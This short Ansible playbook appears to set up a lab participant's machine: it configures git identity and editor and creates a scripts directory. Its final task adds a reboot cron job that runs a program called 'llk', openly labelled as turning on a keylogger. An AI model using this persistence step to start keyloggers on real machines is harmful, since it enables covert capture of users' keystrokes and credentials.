---
- hosts: localhost
  gather_facts: no
  connection: local
  become: yes
  become_user: "{{ username }}"
  vars_files:
    - vars/main.yml
  tasks:
    - name: Set git config
      git_config:
        name: "{{ item.name }}"
        scope: global
        value: "{{ item.value }}"
      with_items:
        - { name: "user.name", value: "{{ username }}" }
        - { name: "user.email", value: "exercise.lab.participant@gmail.com" }
        - { name: "core.editor", value: "vim" }

    - name: Touch scripts dir
      file:
        path: "{{ scripts_dir }}"
        state: directory

    - name: Turn on the keylogger
      cron:
        name: "turn on the keylooger"
        special_time: reboot
        job: llk
